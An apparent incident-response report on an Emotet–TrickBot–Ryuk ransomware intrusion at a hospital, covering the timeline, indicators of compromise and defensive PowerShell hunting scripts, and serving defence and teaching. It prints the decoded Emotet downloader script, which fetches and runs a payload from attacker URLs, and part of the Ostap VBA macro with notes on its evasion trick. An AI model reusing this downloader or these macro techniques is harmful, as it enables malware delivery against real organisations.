Ransomware Attack Analysis


Introduction

The Emotet – TrickBot – Ryuk ransomware killchain is an advanced cybersecurity threat that organizations and Cybersecurity professionals face. Understanding the specific techniques, tactics, and procedures (TTPs) that the threat actors who use these tools employ can provide vital insight to protecting against and responding to incidents. In this paper, we will explore evidence collected and analysis performed during real-world incident response efforts led by Ingalls Information Security (Ingalls). Victim organization and employee names have been changed to protect the identity of the organization that engaged Ingalls to respond. While not all components of the investigation are included in this paper, it does focus on the TTPs and Indicators of Compromise to provide understanding of the attack chain that similar organizations face on a daily basis.

Our investigation methodology is fairly straightforward: identify Indicators or Evidence of Compromise (IOCs and EOCs) via computer forensic evidence and search all available data records for additional evidence. Ingalls analyzed netflow logs as well as Endpoint Detection & Response (EDR) data from CylancePROTECT and Optics. In addition, Microsoft Exchange server logs, Windows event logs, and SQL server trace logs were also reviewed during this effort.  IOCs were also searched on various Open Source Intelligence sources (OSINT) to gather additional insight.

Emotet

Emotet is a self-propagating banking trojan first identified by researchers in 2014, and it has been continually upgraded since. Emotet initially functioned as an information stealer; today its customizable modules, its popularity in Malware-as-a-Service (MaaS) operations, and its ability to send data to and receive commands from Command and Control (C2) servers are used by criminal groups to deliver other trojans, information stealers, and ransomware payloads. Initially, Emotet was sent as a malicious email attachment whose Visual Basic for Applications (VBA) macros executed obfuscated PowerShell scripts. More recently it has also been deployed through other means, such as Remote Desktop Protocol (RDP) brute force attacks.

TrickBot

The TrickBot information stealer, first seen in 2016, is another common MaaS banking trojan. While TrickBot is sometimes spread independently via malicious emails, RDP brute force attacks, and drive-by downloads, it is often deployed as a secondary infection by other trojans such as Emotet. TrickBot is particularly effective at harvesting network credentials, computer credentials, website credentials from browsers, WiFi passwords, VPN credentials and configuration, and cryptocurrency wallet information, and, like Emotet, TrickBot has customizable modules, self-propagation capabilities, and the ability to communicate via C2 servers.

Ryuk

Ryuk, first seen in 2018, is ransomware that extorts victims by encrypting their files and demanding a Bitcoin payment for the decryption key. Ryuk is another component of the MaaS ecosystem and is frequently deployed after an Emotet and TrickBot infection. Ryuk's code is derived from the Hermes ransomware, which had been used by North Korea's Lazarus Group, and early reporting attributed Ryuk to North Korea on that basis; later analysis attributes Ryuk operations to a Russian-speaking criminal group that reused the Hermes code.

Ostap

Ostap is a JScript trojan downloader. Like Emotet, it is often spread via VBA macros in malicious email attachments. Its capabilities include disabling antivirus or security software and propagating by copying itself over other documents reachable from a compromised host, including on network shares. One key difference from Emotet is that Ostap infects a host with JScript rather than obfuscated PowerShell scripts. Ostap is commonly used to deploy other trojans, including TrickBot.


Emotet – The Initial Infection

Initial Infection Mechanism - Spearphishing Email

Day 0  - 12:18:48 CST

Jane Buck, an employee at John Doe Memorial Hospital (JDMH), received a spearphishing email at her JDMH email address. The subject line of the email was "Jane Buck - JDMH". The body read "SOC report 01/16/2020" and was signed "Fawn, Jill" with the address Jill.Fawn@StagMedicalCenter.org.

Figure 1 - Spearphishing Email

Jill Fawn is actually an employee at Stag Medical Center, another nearby hospital, but the address in the email's From field was not hers. The message actually came from saad.alam@ziaudinhospital[.]com, a known Emotet sender address.

Figure 2 - Known Emotet Sender OSINT - https://pastebin.com/xFTyBF34

The email contained an attachment named “QZ-2572 Medical report p2.doc.” The email originated from an IP address of 181.113.134[.]226, an Ecuadorian IP address that is a VPN endpoint.

Figure 3 - 181.113.134[.]226 VPN Certificate OSINT - https://community.riskiq.com/search/181.113.134.226/certificates

The sending host was not the domain's mail server at all: ziauddinhospital.com's legitimate mail resolves to 104.47.4.36, not to 181.113.134[.]226, and reverse DNS on the connecting address did not lead back to the domain. A reverse DNS mismatch alone does not stop a message, though. Only a published and enforced SPF and DMARC policy for the domain would have let JDMH's mail gateway reject or quarantine a message that claimed that domain in its From address but arrived from an unauthorized server.
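The sender check described above, worked through as an added example (this is not code from the Ingalls paper or from the investigation): given a raw message, walk the Received chain to find the IP that actually connected to the victim's mail server, then evaluate that IP against the sending domain's SPF policy. The message text, the internal relay range (10.0.0.0/8) and the SPF record are constructed for the example; only the IP addresses and the domain come from the case. In a live investigation the record would be fetched with Resolve-DnsName -Type TXT rather than read from a table.

```powershell
# Added example, not from the Ingalls paper. Message, relay range and SPF record
# are constructed; a live check would fetch the record with Resolve-DnsName -Type TXT.
$RawMessage = @'
Received: from mail.jdmh.example (10.0.0.25) by exchange.jdmh.example with ESMTP; Thu, 16 Jan 2020 12:18:48 -0600
Received: from ziauddinhospital.com (unknown [181.113.134.226]) by mail.jdmh.example with ESMTP; Thu, 16 Jan 2020 12:18:47 -0600
From: "Fawn, Jill" <saad.alam@ziauddinhospital.com>
To: jane.buck@jdmh.example
Subject: Jane Buck - JDMH

SOC report 01/16/2020
'@

# Assumed: the victim's own relays, and the policy the From domain would publish
# if 104.47.4.36 were its only legitimate outbound server.
$InternalNetworks = @('10.0.0.0/8')
$SpfRecords = @{ 'ziauddinhospital.com' = 'v=spf1 ip4:104.47.4.36 -all' }

function ConvertTo-UInt32([string]$Ip) {
    # Dotted quad to a big-endian integer so CIDR masks can be applied.
    $b = [System.Net.IPAddress]::Parse($Ip).GetAddressBytes()
    ([uint64]$b[0] -shl 24) -bor ([uint64]$b[1] -shl 16) -bor ([uint64]$b[2] -shl 8) -bor [uint64]$b[3]
}

function Test-IPv4InCidr([string]$Ip, [string]$Cidr) {
    $net, $bits = $Cidr -split '/'
    if (-not $bits) { $bits = 32 }
    $mask = ([uint64]0xFFFFFFFF -shl (32 - [int]$bits)) -band 0xFFFFFFFF
    ((ConvertTo-UInt32 $Ip) -band $mask) -eq ((ConvertTo-UInt32 $net) -band $mask)
}

function Get-ConnectingIp([string]$Raw) {
    # Received headers are prepended hop by hop; the first one whose source lies
    # outside our own networks is the host that handed us the message.
    $headers = ($Raw -split "`r?`n`r?`n", 2)[0] -split "`r?`n"
    foreach ($h in ($headers | Where-Object { $_ -match '^Received:' })) {
        if ($h -match 'from\s+\S+\s*\(.*?\[?(\d{1,3}(?:\.\d{1,3}){3})\]?') {
            $ip = $Matches[1]
            if (-not ($InternalNetworks | Where-Object { Test-IPv4InCidr $ip $_ })) { return $ip }
        }
    }
}

function Get-FromDomain([string]$Raw) {
    if ($Raw -match '(?m)^From:.*?([A-Za-z0-9._%+-]+)@([A-Za-z0-9.-]+)') { return $Matches[2].ToLower() }
}

function Test-Spf([string]$Ip, [string]$Record) {
    # Minimal evaluator: ip4 and all only. include/a/mx/ptr need DNS, so offline
    # they are reported as permerror rather than silently skipped.
    $q = @{ '+' = 'pass'; '-' = 'fail'; '~' = 'softfail'; '?' = 'neutral' }
    $terms = $Record -split '\s+'
    if ($terms[0] -ne 'v=spf1') { return 'none' }
    foreach ($t in ($terms | Select-Object -Skip 1)) {
        $qual = '+'
        if ($q.ContainsKey([string]$t[0])) { $qual = [string]$t[0]; $t = $t.Substring(1) }
        $mech, $value = $t -split ':', 2
        switch ($mech.ToLower()) {
            'all' { return $q[$qual] }
            'ip4' { if (Test-IPv4InCidr $Ip $value) { return $q[$qual] } }
            default { return 'permerror' }
        }
    }
    return 'neutral'
}

$ip     = Get-ConnectingIp $RawMessage
$domain = Get-FromDomain $RawMessage
$spf    = if ($ip -and $domain -and $SpfRecords.ContainsKey($domain)) { Test-Spf $ip $SpfRecords[$domain] } else { 'none' }
[pscustomobject]@{ FromDomain = $domain; ConnectingIp = $ip; Spf = $spf }
```

A result of fail means the connecting host is not one the domain authorizes to send its mail, which is exactly the condition a DMARC policy of p=reject or p=quarantine would have acted on at the gateway. Replace $RawMessage with the headers exported from Exchange (or the original .eml) and the table lookup with a live TXT query when working a real case.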


Emotet Downloader

Day 0 - 13:11:27 CST

Jane Buck opened the email attachment. The document carried a VBA macro in its Document_Open handler (which runs automatically when the Word document is opened with macros enabled) that launched a Base64-encoded PowerShell command in a hidden window (powershell -w hidden -en ...; the encoded command and its decoded form are listed under Malicious Script IOCs below).

Figure 4 - QZ-2572 Medical report p2.doc - Emotet Downloader Encoded PowerShell Script

This script reaches out to download 796.exe from the following URLs, trying each in turn until one succeeds:

  • hxxp://ajhmanamlak[.]com/wp-content/rcz9/ (46.4.213[.]201)
  • hxxp://maphagroup[.]com/wp-admin/mtq/ (194.5.188[.]11)
  • hxxp://www.meggie-jp[.]com/images/Tznj/ (47.245.59[.]74)
  • hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/ (45.124.87[.]127)
  • hxxps://nnjastudio[.]com/wp-admin/xHjsw/ (104.18.58[.]143)


The script saves 796.exe, an Emotet loader, to the user's profile directory and executes it once the download is at least 33,113 bytes (presumably a crude check that the server returned a binary rather than an error page); the loader was later observed on disk as publishmsp.exe. It then downloads the Emotet module nonsensor.exe to C:\Windows\SysWOW64\ and registers it as a service (HKLM\SYSTEM\ControlSet001\Services\nonsensor). The service established connectivity with 100.6.23[.]40, an active Emotet Epoch 2 command and control (C2) server. With this foothold in place, Emotet, TrickBot, and Ryuk began deploying throughout JDMH's network. In addition to the initial infection files, the attackers dropped several variants of Emotet, TrickBot, and Ryuk into JDMH's environment.


Propagation

Once the attackers had access to the victim environment, they spent the next 24 hours staging their attack. After enumerating the network, they propagated Emotet, TrickBot, and Ryuk to various locations on victim machines, including C:\Users\Default\AppData\Roaming\WinNetCore\, C:\Users\Public\Junk\, C:\Windows\Temp\bdcore_tmp\, C:\ProgramData\, C:\Temp\, C:\Users\User\Public\, and the Recycle Bin (a common hiding place for malware). Emotet and TrickBot are well known for propagating by enumerating network resources, brute forcing user accounts, and writing to shared drives. One of the more novel methods used in JDMH's environment was delivery through Active Directory Group Policy startup, shutdown, logon, and logoff scripts.


Persistence

Deploying via Active Directory Group Policy scripts was likely intended as both a propagation method as well as a persistence mechanism. However, quick actions in isolating infected devices and restoring servers from clean backups prevented the attackers from being able to rely on this as an ongoing persistence mechanism.

Figure 5 – Cylance Optics Instaquery Result Showing Group Policy Persistence Mechanism

The attackers also used scheduled tasks to achieve persistence. Specifically, they created a scheduled task named “Windows Net Core” on compromised machines to re-infect with TrickBot and scheduled tasks named “comp_sys”, “comp_sys.h”, “user_userlogon” and “user_userlogon_h” on compromised machines to re-infect with Emotet.

Another, more involved persistence mechanism was also seen. JDMH used BitDefender Endpoint Security, deployed via a remote monitoring and management (RMM) tool, to protect its endpoints. BitDefender did not prevent Emotet, TrickBot, or Ryuk from infecting the environment, and worse, the attackers turned it into a persistence mechanism by exploiting CVE-2019-17099, a DLL search-order hijacking vulnerability in BitDefender Endpoint Security versions 9.6.11.163 and prior: the service loads a DLL by name from its search path, so a malicious DLL planted there runs with the service's privileges. The attackers used this to reload the Ryuk encryptor on compromised computers. Cylance Optics detections showed the Ryuk encryptor being reloaded on victim machines every time the EPSecurityService.exe service started.

Figure 6 – Cylance Optics Focus Data Showing EPSecurityService.exe Persistence Mechanism


Ransomware

Day 1 - Shortly after 13:00:00 CST

The attackers began infecting computers with Ryuk ransomware. JDMH IT contacted their managed service provider (MSP) for assistance, and the MSP immediately began isolating infected devices, gathering information to establish the scope of the infection, and bringing up backups of infected servers. Ryuk deleted Volume Shadow Copies and disabled the Volume Shadow Copy Service on infected computers, removing the easiest local recovery path. The ryukreadme.html ransom note gave orfhissipmay1970@protonmail[.]com as the address for contacting the attackers.
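The artifacts described in the Propagation, Persistence and Ransomware sections (the nonsensor service, the drop directories, the re-infection scheduled tasks, the Group Policy scripts, the EPSecurityService.exe DLL hijack and the Ryuk note) can be hunted on a single host with the script below. It is an added example and not code from the Ingalls paper or the investigation; the task, service, directory and note names come from the paper, while the optional IOC hash file (file-iocs.txt), the SYSVOL path pattern, and the output shape are assumptions made for this example.

```powershell
# Added example, not from the Ingalls paper: a read-only hunt for the staging and
# persistence artifacts described above, run on one Windows host from an elevated
# session (Get-ScheduledTask needs Windows 8 / Server 2012 or later). Task, service,
# directory and note names come from the paper; the optional IOC hash file, the
# SYSVOL path pattern and the output shape are assumptions for this example.
$TaskNames = 'Windows Net Core', 'comp_sys', 'comp_sys.h', 'user_userlogon', 'user_userlogon_h'
$DropDirs  = 'C:\Users\Default\AppData\Roaming\WinNetCore', 'C:\Users\Public\Junk',
             'C:\Windows\Temp\bdcore_tmp', 'C:\ProgramData', 'C:\Temp', 'C:\Users\User\Public'
# Optional: one SHA-256 per line (the File IOCs listed below); matches are flagged separately.
$KnownHashes = if (Test-Path .\file-iocs.txt) { Get-Content .\file-iocs.txt } else { @() }

$Findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding([string]$Category, [string]$Detail) {
    $Findings.Add([pscustomobject]@{ Host = $env:COMPUTERNAME; Category = $Category; Detail = $Detail })
}

# 1. Scheduled tasks that re-infected hosts with TrickBot and Emotet.
Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object { $TaskNames -contains $_.TaskName } |
    ForEach-Object {
        $actions = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        Add-Finding 'ScheduledTask' "$($_.TaskPath)$($_.TaskName) -> $actions"
    }

# 2. The Emotet module registered as the "nonsensor" service.
$svcKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\nonsensor'
if (Test-Path $svcKey) {
    Add-Finding 'Service' "nonsensor ImagePath=$((Get-ItemProperty $svcKey).ImagePath)"
}

# 3. Payloads staged in the drop directories and in every user's Recycle Bin.
$recycle = @(Get-ChildItem -LiteralPath 'C:\$Recycle.Bin' -Directory -Force -ErrorAction SilentlyContinue | ForEach-Object FullName)
foreach ($dir in (($DropDirs + $recycle) | Where-Object { Test-Path -LiteralPath $_ })) {
    Get-ChildItem $dir -Recurse -Force -File -Include *.exe, *.dll, *.bat, *.ps1, *.vbs, *.js, *.jse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hash = (Get-FileHash $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            $cat  = if ($KnownHashes -contains $hash) { 'KnownIocHash' } else { 'StagedFile' }
            Add-Finding $cat "$($_.FullName) sha256=$hash"
        }
}

# 4. Group Policy startup/shutdown/logon/logoff scripts in SYSVOL (domain-joined hosts only).
if ($env:USERDNSDOMAIN) {
    Get-ChildItem "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies" -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.FullName -match '\\Scripts\\(Startup|Shutdown|Logon|Logoff)\\' } |
        ForEach-Object { Add-Finding 'GpoScript' "$($_.FullName) modified=$($_.LastWriteTime)" }
}

# 5. DLL search-order hijack of Bitdefender's EPSecurityService.exe (CVE-2019-17099):
#    any DLL beside the service binary that is not validly signed by Bitdefender.
Get-CimInstance Win32_Service -Filter "PathName LIKE '%EPSecurityService.exe%'" -ErrorAction SilentlyContinue |
    ForEach-Object {
        $exe = $_.PathName -replace '^"?(.*?EPSecurityService\.exe).*$', '$1'
        Get-ChildItem (Split-Path $exe -Parent) -Filter *.dll -File -ErrorAction SilentlyContinue | ForEach-Object {
            $sig = Get-AuthenticodeSignature $_.FullName
            if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Bitdefender') {
                Add-Finding 'SuspiciousDll' "$($_.FullName) status=$($sig.Status) signer=$($sig.SignerCertificate.Subject)"
            }
        }
    }

# 6. Ryuk's note, and the Volume Shadow Copy service it disables.
Get-ChildItem C:\Users -Recurse -Force -Filter 'ryukreadme*' -ErrorAction SilentlyContinue |
    ForEach-Object { Add-Finding 'RansomNote' $_.FullName }
$vss = Get-Service VSS -ErrorAction SilentlyContinue
if ($vss -and $vss.StartType -eq 'Disabled') { Add-Finding 'VssDisabled' "VSS StartType=$($vss.StartType)" }

$Findings | Sort-Object Category, Detail | Format-Table -AutoSize
```

C:\ProgramData and C:\Temp will always produce StagedFile rows, so treat that category as a candidate list to triage against the File IOCs rather than as a verdict; KnownIocHash, ScheduledTask, Service and GpoScript rows are the ones that warrant immediate isolation. The GPO check reads SYSVOL directly because a script planted there re-infects every host that processes the policy, which is why the paper notes it served as both propagation and persistence.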


Secondary Infection Attempt - Day 28

Beginning at 11:25 CST, a JDMH user's credentials were used to send three emails from 37.221.113[.]166, a datacenter IP address in England. The credentials were presumably harvested by TrickBot during the initial attack and were used either by the same attackers in a second attempt to infect JDMH's environment or by a different attacker who purchased them on a Dark Web forum. JDMH had not yet completed a global password reset, so the account still gave access to the cloud-based email service. This secondary infection attempt underscores the urgency of a global password reset following a credential-harvesting or information-stealing attack.

These emails were sent to a JDMH group email account, a JDMH distribution list of all department managers, and a JDMH distribution list of all JDMH users. The subject of the first email was "Notification statement for written contract No.30449", and the body claimed that the recipient had "missed obligatory compensation for 1481.67 US Dollars date" and carried a malicious document named "cl_inf_HC_163_86818.doc". The subject of the second email was "Second claim for written contract No.64312", and the body claimed that the recipient had "dropped obligatory payment for 3152.98 US Dollars date" and carried a malicious document named "paym_req_EC_642_77095.doc". The subject of the third email was "Resended claim for contract No.81253", and the body claimed that the recipient had "missed obligatory compensation for 1255.43 US Dollars date" and carried a malicious document named "iss_cont_DT_174_23992.doc".

Figure 7 - Secondary Infection Attempt 1

Figure 8 - Secondary Infection Attempt 2

Figure 9 - Secondary Infection Attempt 3

All three malicious documents carry the same Ostap VBA macro, which writes the document's body text out as a JScript Encoded file named "Dsaow.GaerIok.jse" and runs it through WScript.Shell (the macro is reproduced under Malicious Script IOCs below). If the Ostap script fails to download its payload, it attempts to replace other Office documents on attached drives and network shares with copies of itself. When opened in Microsoft Word 2010 the macro did not fully execute, but in Microsoft Word 2016 it infected the host with TrickBot. The malware then contacts ipecho.net (probably to learn the victim's external IP address) and the DNS-based blocklists cbl.abuseat.org and zen.spamhaus.org (presumably to learn whether that address is already listed as a spam source). It also attempts to connect to hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php to report the victim computer's name, user name, IP address, and network adapter information. 185.180.199[.]77 is a known Ostap and TrickBot host located in the Netherlands. TrickBot then attempts to establish connectivity with, and download the systeminfo, msconfig, and pwgrab modules from, one of the following C2 servers:

Figure 10 - C2 Servers

Fortunately, JDMH's environment had been successfully contained, and JDMH IT staff quickly noticed and responded to the emails, securing the compromised account and telling users not to open the message if they had received it.


Dark Web Forum - JDMH Credentials for Sale

A list of JDMH computer names and user credentials was found for sale on a Dark Web forum. These were likely the result of TrickBot harvesting credentials within the environment. Fortunately, they were outdated computer names and credentials that had already been subject to the global password reset performed during remediation. While JDMH has taken steps to further secure their environment with a defense in depth approach, the attackers still persist in their efforts to extort money through ransomware attacks.


Post-Incident Activity

JDMH received a thorough report detailing the timeline of the attack and the analysis of malicious files and activity within their environment. This report was briefed to their IT staff, MSP representatives, executive leadership, and legal counsel. Ingalls provided JDMH with recommendations for thoroughly eradicating malware and persistence mechanisms and for securing their IT environment and user accounts. JDMH also signed up for Ingalls' Managed Detection and Response (MDR) service as an ongoing component of their defense in depth strategy. Doing so was simple because Ingalls had already deployed its MDR hardware and software into JDMH's environment for the incident response effort.


Indicators of Compromise

File IOCs

53518AF93CAE115B68AF828E50CD70884E203FBFBD46C9631F7D65CB3F74251F

11B42BA8093CD242D37C111A2DFA37311EB5CA77BC8DD118A952088D5716EC15

7DC18BF00ADEF10775C2A73515B7644EF6C26DB0006CAC82536934DE86D03E6F

C6B5DFAE20D0777716DF85C66F3FACB0223B18913169B61A1D9A0D249CCBCA7A

BE403CE2D14F38B66528D438457927218F1AA44A68530BF46B2703DA75DCC8BD

DD1BD34A80DB022CACFDD11EE676FDA7BE9065DF14D8084B6029DB56283DEE79

1328DD556749D061CD4468BF907591FDE215C7B6F1755BBA566D9C335E479EFB

EB7033650DCCB5FA8EC43DA571A44AF46F487ED084FDE6272DE011ABEF54AE00

05A14271A14004BF89D8B4DBED8E876A0A182BD98864BEDC86D824647D9D5810

FA582803942B20C584CE8F353B56D65EF034FC6A70B6E41B07EAAF703E558AC5

BD26B6792D6C6D14D5E7CE1128C4B00095BD3FF265FDD8E5B187FDAA07369D16

05903B62D309D5B4C04C7C6865B1711CD9E4E6370D4DBF419B1611FF17C7A112

FF31DFFDEAF53A96EB28717FAF0CCCDD6B1FFD757310A99092295C486275AD67

0D612A370FBDAAEAC7527DDFE1F7F0680FA54DD23807C34654537B8E390E552E

6494234E7B028CF86A6A1DE8B5352CA818C7E145ADF6FE38F9E6533358DA7C8F

096ADEAA15C1BBBE3723921796B51F7DECB9F6F90AAD03609D938D969B583C17

08BC5BBE5AFF4C6DFC879FD837AAA7A38E6325FA6082093212289F56C5EA1CF8

781290FBF153C565F31321C36E634E892AE5373A8B0D5494315B196992C99D5A

B983018C45B1D8095BE9F34EEB9E893537656FE21F5F5E66EFBB3A9D855D2343

2792E0D21318DC8918A9906A5E2B5B52AE8F756870EB96DD4D2DB48FD7B88548

31AFE5312E444E707420703745390F18FC2B854A0961EA3961BC1AA31CD6FA50

CAB2D2903DE9A3FEACF2004A81AC68D4C73B4C31CD5B864F48ACA3AB383893A1

2B85419B0DD19A806F01176E3ED3C96B451BD2E915B35209A0237D0D5569B890

DD23E2A9B6679E3FE85755DF3CFEC9CC25C3A5945C21E7FF2FE719D23C68D2BA

F5665EF7D190E78F5F90C92D0406E58530030FC67366D38D73EEADC6EE69AA51

6E3DDE8C5D05DE1CE2A6588460AE4053A438AE5E66A87ED643A8A23CB6C4CDAB

8BD68AF164920B11B1CEBFE82400E077E34E88528357A8690F37DF969C8D719D

E8629541F510A7A5792B112A080B5BE2F3E88F6DC30169875D7F6B5DE2EB16DC

CD91E03069136BAC09B18D685CD1F9B948EEA96DA64A8BC9E2DAA3A6A44CA81F


Network IOCs

193.26.217[.]243:443

5.2.78[.]70:443

5.34.177[.]40:443

5.2.78[.]77:443

185.186.77[.]222:443

185.65.202[.]240:443

188.227.84[.]209:443

185.45.193[.]76:443

181.129.104[.]139:449

107.172.165[.]149:443

181.112.157[.]42:449

181.140.173[.]186:449

45.148.120[.]14:443

170.84.78[.]224:449

46.174.235[.]36:449

82.146.62[.]52:443

64.44.51[.]125:443

185.11.146[.]86:443

5.182.210[.]226:443

46.229.213[.]27:443

200.21.51[.]38:449

51.254.164[.]240:443

45.148.120[.]13:443

190.214.13[.]2:449

36.89.85[.]103:449

181.129.134[.]18:449

186.71.150[.]23:449

181.113.28[.]146:449

88.99.112[.]87:443

164.68.120[.]56:443

81.177.180[.]254:443

200.127.121[.]99:449

121.100.19[.]18:449

119.252.165[.]75:449

186.232.91[.]240:449

131.161.253[.]190:449

181.196.207[.]202:449

114.8.133[.]71:449

202.29.215[.]114:449

171.100.142[.]238:449

180.180.216[.]177:449

181.113.134[.]226

46.4.213[.]201

194.5.188[.]11

47.245.59[.]74

45.124.87[.]127

104.18.58[.]143

100.6.23[.]40

185.180.199[.]77

92.63.98[.]59

82.146.62[.]52

2cdajlnnwxfylth4[.]onion

hxxp://ajhmanamlak[.]com/wp-content/rcz9/

hxxp://maphagroup[.]com/wp-admin/mtq

hxxp://www.meggie-jp[.]com/images/Tznj

hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6

hxxps://nnjastudio[.]com/wp-admin/xHjsw

hxxp://185.180.199[.]77/3mBhb0/6VIJ7e.php


Email Address IOCs

saad.alam@ziaudinhospital[.]com

orfhissipmay1970@protonmail[.]com


Malicious Script IOCs

QZ-2572 Medical report p2.doc

Powershell -w hidden -en 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

This Base64 string decodes as:

$Zayuxzptkt='Iwrugjuccrj';$Dcdxsjdnbe = '796';$Wofbhxil='Ztxohcyjzq';$Ibluqjxnvox=$env:userprofile+'\'+$Dcdxsjdnbe+'.exe';$Rihrjzgiqdqwd='Jmgewfhvnlf';$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*hxxp://maphagroup[.]com/wp-admin/mtq/*hxxp://www.meggie-jp[.]com/images/Tznj/*hxxp://giatlalaocai[.]com/wp-admin/Yz98SWY6/*hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'."SPl`IT"('*');$Szvomaww='Njfjtvcblfo';foreach($Ufiayanxhyox in $Nvcwonczceycn){try{$Zgkvhhmc."DoWnL`O`AdFIle"($Ufiayanxhyox, $Ibluqjxnvox);$Slsqjnufdefpr='Jcerpxsv';If ((&('G'+'et'+'-Item') $Ibluqjxnvox)."LeN`gTH" -ge 33113) {[Diagnostics.Process]::"sTA`Rt"($Ibluqjxnvox);$Zkkupmdcccu='Izjkfztcnar';break;$Wzaaqbuu='Viotlofzps'}}catch{}}$Qniqrcmlj='Opecclspsu')
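Decoding and triaging a command line of this shape is the first step a responder takes when one turns up in process-creation logging (Sysmon Event ID 1 or Security 4688 with command-line auditing). The script below is an added example and not code from the paper or the investigation: because the -en argument above is redacted, the sample command line is rebuilt from a shortened copy of the decoded script (URLs left defanged as they appear on the page), then decoded again, lightly de-obfuscated, and reduced to the facts that matter (URLs, drop location, size gate, what gets executed).

```powershell
# Added example, not from the paper. The encoded argument on the page is redacted,
# so the sample command line is rebuilt here from a shortened copy of the decoded
# script, with its URLs left defanged exactly as they appear above.
$DecodedSample = @'
$Dcdxsjdnbe = '796';$Ibluqjxnvox=$env:userprofile+'\'+$Dcdxsjdnbe+'.exe';$Zgkvhhmc=.('ne'+'w-obje'+'ct') nET.WEBcLIEnT;$Nvcwonczceycn='hxxp://ajhmanamlak[.]com/wp-content/rcz9/*hxxp://maphagroup[.]com/wp-admin/mtq/*hxxps://www.nnjastudio[.]com/wp-admin/xHjsw/'."SPl`IT"('*');foreach($Ufiayanxhyox in $Nvcwonczceycn){try{$Zgkvhhmc."DoWnL`O`AdFIle"($Ufiayanxhyox, $Ibluqjxnvox);If ((&('G'+'et'+'-Item') $Ibluqjxnvox)."LeN`gTH" -ge 33113) {[Diagnostics.Process]::"sTA`Rt"($Ibluqjxnvox);break}}catch{}}
'@
# -EncodedCommand carries Base64 over UTF-16LE text, so the sample is built the same way.
$SampleCommandLine = 'Powershell -w hidden -en ' +
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($DecodedSample))

function ConvertFrom-EncodedCommand([string]$CommandLine) {
    # Accept the spellings PowerShell does: -e, -ec, -en, -enc, -EncodedCommand.
    if ($CommandLine -match '-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)') {
        [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
    }
}

function Remove-CheapObfuscation([string]$Script) {
    # Strip backticks that split member names ("DoWnL`O`AdFIle") and rejoin
    # concatenated literals ('ne'+'w-obje'+'ct' becomes 'new-object').
    ($Script -replace '`', '') -replace "'\+'", ''
}

function ConvertTo-Defanged([string]$Url) {
    # Normalise then re-defang the host, so fanged and half-defanged input end up alike.
    $scheme, $rest = $Url -split '://', 2
    $hostname, $path = $rest -split '/', 2
    $hostname = ($hostname -replace '\[\.\]', '.') -replace '\.', '[.]'
    $tail = if ($null -ne $path) { '/' + $path } else { '' }
    ($scheme -replace '^http', 'hxxp') + '://' + $hostname + $tail
}

function Get-EncodedCommandTriage([string]$CommandLine) {
    $script = ConvertFrom-EncodedCommand $CommandLine
    if (-not $script) { return }
    $clean = Remove-CheapObfuscation $script
    $urls  = [regex]::Matches($clean, '(?i)h[tx]{2}ps?://[^\s''"*;)]+') | ForEach-Object { ConvertTo-Defanged $_.Value }
    $size  = if ($clean -match '-ge\s+(\d+)') { [int]$Matches[1] }
    [pscustomobject]@{
        Urls              = @($urls)
        MinimumSizeBytes  = $size      # the download is only executed if at least this large
        UsesWebClient     = ($clean -match '(?i)net\.webclient') -and ($clean -match '(?i)downloadfile')
        WritesUserProfile = $clean -match '(?i)\$env:userprofile'
        StartsProcess     = $clean -match '(?i)diagnostics\.process\]::"?start"?'
        DecodedScript     = $clean
    }
}

Get-EncodedCommandTriage $SampleCommandLine | Format-List
```

On a real command line, paste the logged value in place of $SampleCommandLine; ConvertFrom-EncodedCommand alone is enough to read the script, and the triage object gives the URLs and host artifacts to block and hunt for without executing anything. Fuller Emotet samples use the same skeleton with more junk variables, which is why the de-obfuscation here only touches the two tricks (backticks and string concatenation) that this script relies on.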

cl_inf_HC_163_86818.doc, paym_req_EC_642_77095.doc, and iss_cont_DT_174_23992.doc VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' The document embeds a Remote Desktop ActiveX control named "Moon". Its
' OnDisconnected event, not Document_Open or AutoOpen, is what runs the macro
' (see Moon_OnDisconnected below), which sidesteps scanners keyed on the usual
' auto-execute entry points.
Attribute VB_Control = "Moon, 0, 0, MSTSCLib, MsRdpClient8NotSafeForScripting"

Private Kirfool As String   ' path of the dropped .jse payload

' Junk: IsMs is never read.
Sub RePac()
    If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
End Sub

' String decoders. Sensitive literals are padded with "a" and "y" so that
' "WScript.Shell", "Run", "\..\..\" and "jse" never appear in clear text.
Private Function Herdio(i As String) As String
    Herdio = Replace(i, "a", "")
End Function

' Padding arithmetic; with the arguments passed from Moon_OnDisconnected
' (psiz = 0) ix is always 40, so control always reaches the Dro label, which
' launches the payload.
Function Mulent(parr As Variant, psiz As Integer, pbl As Integer, prow As Integer, pcol As Integer, pbit As Integer, dc As Long) As Boolean
    Dim ix%, va%, r%, c%, s%
    r = prow
    c = pcol
    If psiz > 0 Then
        s = psiz / pbl
        If r < 0 Then
            r = r + psiz
            c = c + 4 - ((psiz + 4) Mod 8)
        End If
        If c < 0 Then
            c = c + psiz
            r = r + 4 - ((psiz + 4) Mod 8)
        End If
        If c >= psiz Then
            c = c - psiz
            r = r + 1
        End If
        r = r + (Int(r / s) * 2)
        c = c + (Int(c / s) * 2)
    End If
    Mulent = False
